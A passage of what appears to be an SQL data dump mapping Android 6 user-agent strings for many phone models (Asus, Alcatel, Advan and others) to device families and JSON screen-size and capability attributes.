Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A553 Power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A555 Universe) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A5_Ready) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A5_Ready_TM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A62) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A75 MAX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A8 MAX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; A97 IPS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ADS1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ADVAN_M4) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AGM A7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ALE-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ALE-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ALE-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ALE-TL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ALE-UL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ALIGATOR RX510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AM350) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AM402) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AM508) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AS-4411) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AS-4421) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AS-5421) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AS-5432) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AS-5435) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_A007) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_T00N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_X007D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_X007DB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_X008) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_X008D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_X008DA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_X008DB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_X008DC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_X009DA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_X009DB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_X009DD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_X00AD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_X00ADA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_X00DD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z008D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z00AD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z00ED) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z00LD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z00MD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z00RD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z00TD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z00UD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z00UDH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z00XS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z010D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z010DB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z010DD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z011D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z012DA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z012DE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z012S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z016S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z017D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z01BD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z01BDB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z01BDC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z01BS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z01FD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z01HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ASUS_Z01HDA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AVVIO Q501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AX1035) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AX1070) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AX680+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AX681) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AX685) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AX750) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AX821) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AX920) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AX921) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; AXE_M_LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Advance 4.0 L3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Advance 4.0M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Advance 5.0 HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Alcatel 6055U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 